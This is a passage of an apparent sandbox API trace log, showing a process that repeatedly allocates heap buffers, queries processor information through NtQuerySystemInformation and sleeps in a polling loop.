dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.615] Sleep (dwMilliseconds=0x110) [0215.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.645] Sleep (dwMilliseconds=0x110) [0215.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.709] Sleep (dwMilliseconds=0x110) [0215.728] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.728] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.729] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.729] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.729] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.729] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.736] Sleep (dwMilliseconds=0x110) [0215.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.751] Sleep (dwMilliseconds=0x110) [0215.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.773] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.773] Sleep (dwMilliseconds=0x110) [0215.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.785] Sleep (dwMilliseconds=0x110) [0215.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.879] Sleep (dwMilliseconds=0x110) [0215.933] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.933] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.934] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.934] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.934] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.938] Sleep (dwMilliseconds=0x110) [0216.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.004] Sleep (dwMilliseconds=0x110) [0216.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.049] Sleep (dwMilliseconds=0x110) [0216.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.104] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.105] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.105] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.106] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.155] Sleep (dwMilliseconds=0x110) [0216.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.303] Sleep (dwMilliseconds=0x110) [0216.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0216.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0216.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0216.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0216.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.376] Sleep (dwMilliseconds=0x110) [0216.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0216.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0216.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0216.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0216.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 